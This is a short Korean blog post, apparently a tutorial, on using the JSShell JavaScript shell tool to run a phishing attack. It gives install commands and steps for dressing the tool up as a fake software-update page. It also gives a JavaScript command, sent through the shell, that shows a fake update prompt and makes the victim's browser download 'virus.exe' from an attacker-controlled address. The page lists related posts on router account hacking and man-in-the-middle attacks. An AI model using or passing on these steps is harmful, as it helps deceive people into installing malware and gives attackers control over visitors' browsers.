https://github.com/Den1al/JSShell
[설치법]
cd JSShell
pip install -r requirements.txt
나머지 설치법은 길어서 github의 installtion 참조
[피싱페이지를 활용한 사용법]
피싱사이트를 그럴싸하게 하기 위해 가짜 업데이트 템플릿 사이트에 가서 해당 index.html 소스코드를 복사한 후 html 파일로 만들고 JSShell/web/templates 안의 index.html의 head에 있는 script문 3개를 복사해온 html 파일의 헤더에 붙여넣고 완성된 파일은 templates 에 원래 있던 index 대체로 넣어준다.
>list - 세션 리스트
>select 1 - 1세션 선택
>com - 자바 커맨드 창
>var execute = confirm ("업데이트를 다운로드해야 실행됩니다.") ;if(execute) {window.location.href='http://192.168.0.8/virus.exe';}
컨펌박스 [alert 창]를 띄우고 컨펌박스에 확인 누를경우 /var/www/html에 넣어둔 virus.exe 파일을 다운받도록 합니다.
위 소스코드를 command로 보내면 피해자가 접속한 JSShell 서버 페이지에 alert 창이 뜨며 확인 누르면 악성파일이 받아집니다.
영상 사용법
https://asciinema.org/a/217167
'3. 웹 애플리케이션 취약점 진단' 카테고리의 다른 글
로그인 과정 패킷에서 도출되는 ReturnURL을 활용한 악성 컨텐츠 삽입 방법 + URL 주소 패턴 탐지 우회 (0) | 2024.06.20 |
---|---|
Apache Tomcat 관리자 페이지 취약점 악용 - Metasploit (0) | 2023.12.28 |
취약점 분석 도구 nessus 설치법 (0) | 2023.12.28 |
Ettercap으로 공유기 계정 해킹 (0) | 2023.12.28 |
xerosploit 중간자 공격 도구 사용하기 [dos,RDownload,Sniffing(계정 해킹)] (0) | 2023.12.27 |